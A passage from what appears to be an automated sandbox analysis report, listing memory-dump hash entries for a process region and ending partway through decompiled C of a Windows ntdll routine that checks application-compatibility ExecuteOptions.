                                                • Instruction Fuzzy Hash: B4419072A20216AFEB22DFACC940BAEFBF5BF58718F14012DE651E7291D77499408B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be3b4a51cfa3edcff81842d127ee4f292402115a8f3185dbd1a32f25bb9fad36
                                                • Instruction ID: 5b8f1b3ae18fbc9f07da0c73cb99229a426480593f601d36da36159ee329ed94
                                                • Opcode Fuzzy Hash: be3b4a51cfa3edcff81842d127ee4f292402115a8f3185dbd1a32f25bb9fad36
                                                • Instruction Fuzzy Hash: 8941E1B6600105EBDB269F6CCC52BAF7B7DEF44798F198068EA069B254D670DE01C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1a7370b56a08231ee134f13a4b803da5b209042f7814c29e042afade973f4ff
                                                • Instruction ID: 92c8a748ec35e13d33c4bd3269ff87e16d422add4e59f245c2c3a36ebc08aaed
                                                • Opcode Fuzzy Hash: e1a7370b56a08231ee134f13a4b803da5b209042f7814c29e042afade973f4ff
                                                • Instruction Fuzzy Hash: 68416071A10605EFDB24CF99C981AAAFBF9FF18310F10496DE656D7A50E370EA14CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5efbd333c6abbb73ff62806516ea844327a61026f9fb06c548f8d3f49881ec7
                                                • Instruction ID: 26281b75694c775747a6488d52a751459ee3f6598390d17c27a8086e0605454c
                                                • Opcode Fuzzy Hash: a5efbd333c6abbb73ff62806516ea844327a61026f9fb06c548f8d3f49881ec7
                                                • Instruction Fuzzy Hash: D141BDB1A20205DFCF21DF68C8967AA7BF4BF54358F440119E5116F396C3B4D982CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
                                                • Instruction ID: a44fa4719aadac083172abb8762963b58c3d55d17ba2181ef125f5629fa72161
                                                • Opcode Fuzzy Hash: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
                                                • Instruction Fuzzy Hash: 7311E27365060AEFE7229F58D841FAABBBCEF84760F104029EB058B940DA71EE54CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                • Instruction ID: 9c6a8f0c158db9817edfeb2324d8a2b4139e30d604f15483f67118b621cedf7a
                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                • Instruction Fuzzy Hash: 8F217972600A45DFD736CF4DC560A66F7E9EB94A18F24817EE94987A65D730ED00CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dafcbdfcfc6c82a3978a7392d7873e6d375e6d234143b5bd2c0040783f26fc7b
                                                • Instruction ID: abe79d80f45320e35bdeec5208fb608b495268e57d51aab240a9babe487cb086
                                                • Opcode Fuzzy Hash: dafcbdfcfc6c82a3978a7392d7873e6d375e6d234143b5bd2c0040783f26fc7b
                                                • Instruction Fuzzy Hash: E6215871600600DFD775CF6CC890B6AB7E9FB44754F0088ADE59EC7691DA70E840CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f7185be73fb65c28f1fa73e05d5cd4ef54c315b8423b370a35d477848e35215
                                                • Instruction ID: a418a78a54f1dfefc9b48e605b52dc8b0e6f9236b7436f1c5d1565ede8c6e20a
                                                • Opcode Fuzzy Hash: 9f7185be73fb65c28f1fa73e05d5cd4ef54c315b8423b370a35d477848e35215
                                                • Instruction Fuzzy Hash: A911E67A2916558FF32A8B2CD0E0775B7E8EB4371CF0C045AE98287755D369EC81C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ab0b9df3920caa3bd0c729a1760b7865ba703247c16090db197e3615956b7d8
                                                • Instruction ID: 733ae33664306bc65f6ccdfcfd4bd1c564db37bb9058065163c20ccf97c83c18
                                                • Opcode Fuzzy Hash: 3ab0b9df3920caa3bd0c729a1760b7865ba703247c16090db197e3615956b7d8
                                                • Instruction Fuzzy Hash: 7411483B3151209BCB1A8A189D81A6BB39BEBC5678B34417DDE16877C0DE31AC02C794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0257dad38536ae922378a16ff401e67f48f9f01a25b39a0ed9560e0cc45ff22
                                                • Instruction ID: be838a18b4bac9d8ce29fb7f35c5d2026e88ac10907b5c142285b5255bcce6d6
                                                • Opcode Fuzzy Hash: c0257dad38536ae922378a16ff401e67f48f9f01a25b39a0ed9560e0cc45ff22
                                                • Instruction Fuzzy Hash: 900128726047429FC710EB2CC800B1BBBD9EB94318F448629F985836D0DE30D944CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac6b4b412b0d6e2ea25ee120db8693acf250ed291b347a6370d3e8b2b8bcb513
                                                • Instruction ID: c772fa5e03fccf7c5ad61c4b6346df8b978232dcfbf4ed5ad2b7a266a0faa82f
                                                • Opcode Fuzzy Hash: ac6b4b412b0d6e2ea25ee120db8693acf250ed291b347a6370d3e8b2b8bcb513
                                                • Instruction Fuzzy Hash: 1301A772A00259AFDB14EFA9D805FAFBBB8EF54714F40406AF905EB380D674D900C794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bb78df94e19b03acc29d30f16e8d40d8e21721b006a6da1dc40fffd36aa9794
                                                • Instruction ID: edb8713699dbd94e731b1306417d2b3e2da12956170853febe30d63368d61d06
                                                • Opcode Fuzzy Hash: 7bb78df94e19b03acc29d30f16e8d40d8e21721b006a6da1dc40fffd36aa9794
                                                • Instruction Fuzzy Hash: 8601D471E00208AFDB14EFACD801FAEBBBCEF44714F004066BA00AB380DA349900C794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97b0f3a1d693c94dac8265dccbbed1d22378acaf10cc8ac61e1309db14d8f787
                                                • Instruction ID: 5cba0e053c5843500f2f3ba52cabce71b2df17c91c18f510b1d222d7caa7b68d
                                                • Opcode Fuzzy Hash: 97b0f3a1d693c94dac8265dccbbed1d22378acaf10cc8ac61e1309db14d8f787
                                                • Instruction Fuzzy Hash: 5C0121B5A0021D9FDB04DFA9D9519AEBBB8FF58314F50405AF905E7340D634AA01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14fcca20986434832341a86225daa00a1c2f1fce67e758a32a6127392275f36d
                                                • Instruction ID: 28dff0c03241f6a0dbaa02bbd66940d5ba2826724056b64903d7a7d2a9f65403
                                                • Opcode Fuzzy Hash: 14fcca20986434832341a86225daa00a1c2f1fce67e758a32a6127392275f36d
                                                • Instruction Fuzzy Hash: 3F012CB1A1021DAFDB04DFA9D9559AEBBB8FF58314F50406AFA04E7341D634AD01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8db370aa19184562689ad5cfbbdb8ab93e2329f5e5e5b79f8628a809af571eb7
                                                • Instruction ID: 9fb8639c7ee6696a030e86c8d7d04171233d09001e448adec0cc41d51cc5f208
                                                • Opcode Fuzzy Hash: 8db370aa19184562689ad5cfbbdb8ab93e2329f5e5e5b79f8628a809af571eb7
                                                • Instruction Fuzzy Hash: 88014FB2A0021DAFDB04DFA9D9519EEBBB8FF58314F50406AF904E7350D734AA01CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                • Instruction ID: fd33b4a17136d855f323031b1e887b65a4283d7225daf1629f5d9077d06b7c4f
                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                • Instruction Fuzzy Hash: ACF0FC33265D279BD3325AD9C880F67B6958FD1A64F160035F3059B384D9A09C0287D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                • Instruction ID: 4cbf1eba1202d803be15d6ce756f80b31f6324d05174ef1cff74f4ac61d6b438
                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                • Instruction Fuzzy Hash: DA01A4332106849BE322976DC808F69BBD9EF92758F1A40A1FA148B7B2D779C841C319
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb329978e984ef85ec3fdc0c6d72c3c047c5aebec2711bf9487ebea8592a2003
                                                • Instruction ID: 41d9699e9944b5155be795feb5a025d038ecad272d5fd9370f90244f791129b5
                                                • Opcode Fuzzy Hash: eb329978e984ef85ec3fdc0c6d72c3c047c5aebec2711bf9487ebea8592a2003
                                                • Instruction Fuzzy Hash: 99018B31210608AFD735DF58DC05FAABBFDEB44714F10056DEA0583190DAA5BA04C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f658fdcefa138b932df45f60befacab2f326e1968a0403279e4d62e615a00c69
                                                • Instruction ID: 0f0dd9c778d30c1128a4748cba10afca9ddb7621067d832c2c8cacd8f9ee0d8c
                                                • Opcode Fuzzy Hash: f658fdcefa138b932df45f60befacab2f326e1968a0403279e4d62e615a00c69
                                                • Instruction Fuzzy Hash: FB014F71A0061D9FDB04DFA9D841BAEBBF8FF58314F14406AF905AB380D734AA01CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd1e216aa25cca8aa8d1f47d397fe217dd4a8b071480e8ca6e1ba03d1b3ad3b9
                                                • Instruction ID: 243a0d11191164524eb6675c008fd01f80146c34b582758996a2d73fc21cd4b8
                                                • Opcode Fuzzy Hash: bd1e216aa25cca8aa8d1f47d397fe217dd4a8b071480e8ca6e1ba03d1b3ad3b9
                                                • Instruction Fuzzy Hash: 3501A972A00218AFDB14DBFDC4059AFB7B8EF54714F0080AAF511F7290DA74A9018790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2029a114c36bb4c92c887f33788b343d8ca89f1f3266e36f8717b5269d555587
                                                • Instruction ID: 638d48379b20830e94b54dc58dfcd41893b9bf7922e023a835c2546f561b841c
                                                • Opcode Fuzzy Hash: 2029a114c36bb4c92c887f33788b343d8ca89f1f3266e36f8717b5269d555587
                                                • Instruction Fuzzy Hash: BE01D13155164AAFEB239B5CC894F2A77D8EF00728F004151FD149B2D1DBB8ED80CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                • Instruction ID: 8784a3b4f627091492c17b0d4737bbbde9c425d4527d56c791b21ccfde12b7d7
                                                • Opcode Fuzzy Hash: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                • Instruction Fuzzy Hash: DFF02471724209AFE718DB29CC02B66B7EDEF98300F10807C9949C7260FAB2ED21D355
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0ccf5e7a0eda5a3b1b7adcf92ddcebcd4f83d2d3c35b6683a356d13541b59ab
                                                • Instruction ID: 367dafa7cf08d773fb274eb4adfe5fe80699b39e8a6cf550e94bc719f12caeae
                                                • Opcode Fuzzy Hash: f0ccf5e7a0eda5a3b1b7adcf92ddcebcd4f83d2d3c35b6683a356d13541b59ab
                                                • Instruction Fuzzy Hash: B8013C71A0120DAFCB44EFA9D545AAEB7F4FF18704F408069B905EB381E634AA00CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf508b654d5833ff0ff68d178c2ab85b9fd57d059afb69512d238299fae8005a
                                                • Instruction ID: 874c099b7dc50d1b3397a2f06204ee3809d4df294e8735f4e3848f9d25cdca33
                                                • Opcode Fuzzy Hash: bf508b654d5833ff0ff68d178c2ab85b9fd57d059afb69512d238299fae8005a
                                                • Instruction Fuzzy Hash: A9F06DB29356AA9AE726C66CE04CF21FFD89B05760F44447ED706A7102C6A4D8A0C250
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 953d7a836fa53873b984c3cde78613d0b298fea6c26c7158f0cdbe0731cee5c6
                                                • Instruction ID: 9ff7d0b7b8406a0dd74aef7c07c08c330309db352e861c66aa48420ad0240be2
                                                • Opcode Fuzzy Hash: 953d7a836fa53873b984c3cde78613d0b298fea6c26c7158f0cdbe0731cee5c6
                                                • Instruction Fuzzy Hash: DEF0206B415A859EDF32AF2C24002E33F8AD795218F0A00C5D4A027309C534AA97CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                • Instruction ID: 525f2de8539aee85ca54a095dec2c89acd729ec560d8fb7bd05f037375ff1e36
                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                • Instruction Fuzzy Hash: BFE02B323405416BE7259E09CC80F53776DDF92728F00407CB9041E242C6E6DD0987A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c5e5333fc86428fd8626694e89f80f6deff10afef3ae0e06d4f7b797d41ab46
                                                • Instruction ID: a0d8c01143f19c6dbb4517adc45221609ea456ac7c5d80cfbf15fb4a7de8da51
                                                • Opcode Fuzzy Hash: 1c5e5333fc86428fd8626694e89f80f6deff10afef3ae0e06d4f7b797d41ab46
                                                • Instruction Fuzzy Hash: 85F09070A046089FDB14EFA8D441A6EB7B8EB18304F5080A9E905AB280DA34D9008794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dce26c1defbf01a2d98e0b583e70aae13e7ceae90b44474063db140bc45e458
                                                • Instruction ID: 5bf2ab3bb2fd869f36a404ee048de7cd2a7d151577d18d8ce33262bbd6978f19
                                                • Opcode Fuzzy Hash: 6dce26c1defbf01a2d98e0b583e70aae13e7ceae90b44474063db140bc45e458
                                                • Instruction Fuzzy Hash: 93F082B1A14259AFDB14EBA8D906E7EB7B8FF14304F4404A9BA05DB3C0EB34D900C794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba61fa0f4d2aa4555c76047eb7f986defc4669294e6cd38fa8cc718e5170da65
                                                • Instruction ID: bd4571c85ead907c8a1d8fdca40489b3106fc943c56108086587d9d86b021029
                                                • Opcode Fuzzy Hash: ba61fa0f4d2aa4555c76047eb7f986defc4669294e6cd38fa8cc718e5170da65
                                                • Instruction Fuzzy Hash: 4DF05EB1A14259AFDB14EBA8D905A6EB7B8EF14704F4404A9BA059B281EA34D900C798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a48f04246df0033b0538142f6d15d7e45d3bf2ce0deb6706f9a7998972c979f
                                                • Instruction ID: ee9ceffc6c3fe8551ee3db1ec1003f0fc3b3b2b623c466f1ea86e56a5743f619
                                                • Opcode Fuzzy Hash: 9a48f04246df0033b0538142f6d15d7e45d3bf2ce0deb6706f9a7998972c979f
                                                • Instruction Fuzzy Hash: D2F08271A0524DAFDF18DBE9D446AAEB7B8EF18318F4000A9F605EB384EA74D900C794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4092985bb6be5a9f0e13e7c6ebbaca94018496c7031b0a6a054268ad9f252a5c
                                                • Instruction ID: 9b03a853a92a06adddb24d2f60875b30b2e17ea4dd8f6dbb4a4a4d5b4507485a
                                                • Opcode Fuzzy Hash: 4092985bb6be5a9f0e13e7c6ebbaca94018496c7031b0a6a054268ad9f252a5c
                                                • Instruction Fuzzy Hash: A6F027319252A89FE723E31CC144F21BBEC9B01BB8F254165E80987903C728CC80C680
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction ID: 802ab87b432373f9dd0ff440d359e8ccdebd0c24e5fa7aa75fc072dbb8dcaf01
                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction Fuzzy Hash: ECE0DF32A50158FBDB71ABDDDE05FABBFACDB58A60F0501A5BA04D7190D9609E00C3D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e6d42f6ef49788280b11a841ddcc4c7ca2c16917cb41f4693dedab0473fac2e
                                                • Instruction ID: c869fecb529da45485a309f160e0b1d50a0693c0c9a3f5911e4f8f56a4e4a32d
                                                • Opcode Fuzzy Hash: 1e6d42f6ef49788280b11a841ddcc4c7ca2c16917cb41f4693dedab0473fac2e
                                                • Instruction Fuzzy Hash: A4F03278821701CFCBB1EFA9E90471836BCFB54728F2181AAD1008729CF7386AA4CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction ID: efefcce367956844e40f41f6c2dbe4597096cd3e7395eef99792ace9cd690171
                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction Fuzzy Hash: D7E0C231280349BBDB226F84CC00FB9BB1ADB507A4F104031FE089AAE0C6B1AC91D6C4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                C-Code - Quality: 63%
                                                			E012D40FD(void* __ecx) {
                                                				signed int _v8;
                                                				char _v548;
                                                				unsigned int _v552;
                                                				unsigned int _v556;
                                                				unsigned int _v560;
                                                				char _v564;
                                                				char _v568;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				unsigned int _t49;
                                                				signed char _t53;
                                                				unsigned int _t55;
                                                				unsigned int _t56;
                                                				unsigned int _t65;
                                                				unsigned int _t66;
                                                				void* _t68;
                                                				unsigned int _t73;
                                                				unsigned int _t77;
                                                				unsigned int _t85;
                                                				char* _t98;
                                                				unsigned int _t102;
                                                				signed int _t103;
                                                				void* _t105;
                                                				signed int _t107;
                                                				void* _t108;
                                                				void* _t110;
                                                				void* _t111;
                                                				void* _t112;
                                                
                                                				_t45 =  *0x13cd360 ^ _t107;
                                                				_v8 =  *0x13cd360 ^ _t107;
                                                				_t105 = __ecx;
                                                				if( *0x13c84d4 == 0) {
                                                					L5:
                                                					return E0131B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                				}
                                                				_t85 = 0;
                                                				E012EE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                					_t45 = 0;
                                                				} else {
                                                					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                				}
                                                				if(_t45 == 0) {
                                                					_v552 = _t85;
                                                					_t49 = E012D42EB(_t105);
                                                					__eflags = _t49;
                                                					if(_t49 != 0) {
                                                						L15:
                                                						_t103 = 2;
                                                						_v552 = _t103;
                                                						L10:
                                                						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                							_t45 = 1;
                                                						} else {
                                                							_t53 = E012D41EA(_v564);
                                                							asm("sbb al, al");
                                                							_t45 =  ~_t53 + 1;
                                                							__eflags = _t45;
                                                						}
                                                						__eflags = _t45;
                                                						if(_t45 == 0) {
                                                							_t102 = _t103 | 0x00000040;
                                                							_v552 = _t102;
                                                						}
                                                						__eflags = _t102;
                                                						if(_t102 != 0) {
                                                							L33:
                                                							_push(4);
                                                							_push( &_v552);
                                                							_push(0x22);
                                                							_push(0xffffffff);
                                                							_t45 = E013196C0();
                                                						}
                                                						goto L4;
                                                					}
                                                					_v556 = _t85;
                                                					_t102 =  &_v556;
                                                					_t55 = E012D429E(_t105 + 0x2c, _t102);
                                                					__eflags = _t55;
                                                					if(_t55 >= 0) {
                                                						__eflags = _v556 - _t85;
                                                						if(_v556 == _t85) {
                                                							goto L8;
                                                						}
                                                						_t85 = _t105 + 0x24;
                                                						E01365720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
                                                						_v560 = 0x214;
                                                						E0131FA60( &_v548, 0, 0x214);
                                                						_t106 =  *0x13c84d4;
                                                						_t110 = _t108 + 0x20;
                                                						 *0x13cb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                						_t65 =  *((intOrPtr*)( *0x13c84d4))();
                                                						__eflags = _t65;
                                                						if(_t65 == 0) {
                                                							goto L8;
                                                						}
                                                						_t66 = _v560;
                                                						__eflags = _t66;
                                                						if(_t66 == 0) {
                                                							goto L8;
                                                						}
                                                						__eflags = _t66 - 0x214;
                                                						if(_t66 >= 0x214) {
                                                							goto L8;
                                                						}
                                                						_t68 = (_t66 >> 1) * 2 - 2;
                                                						__eflags = _t68 - 0x214;
                                                						if(_t68 >= 0x214) {
                                                							E0131B75A();
                                                							goto L33;
                                                						}
                                                						_push(_t85);
                                                						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                						E01365720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                						_t111 = _t110 + 0x14;
                                                						_t73 = E01321480( &_v548, L"Execute=1");
                                                						_push(_t85);
                                                						__eflags = _t73;
                                                						if(_t73 == 0) {
                                                							E01365720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                							_t106 =  &_v548;
                                                							_t98 =  &_v548;
                                                							_t112 = _t111 + 0x14;
                                                							_t77 = _v560 + _t98;
                                                							_v556 = _t77;
                                                							__eflags = _t98 - _t77;
                                                							if(_t98 >= _t77) {
                                                								goto L8;
                                                							} else {
